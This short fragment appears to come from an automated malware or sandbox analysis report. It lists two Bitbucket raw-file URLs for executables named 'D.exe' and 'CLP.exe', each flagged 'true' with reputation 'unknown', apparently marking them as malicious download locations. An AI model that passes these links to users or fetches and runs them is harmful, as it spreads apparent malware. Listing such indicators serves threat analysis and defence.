        https://bitbucket.org/5940jg9834/gf3443f3/raw/0adfaef4f847a17ea4e4f656dcd85e76293780ed/D.exe true
          		unknown
          https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/CLP.exe true
            		unknown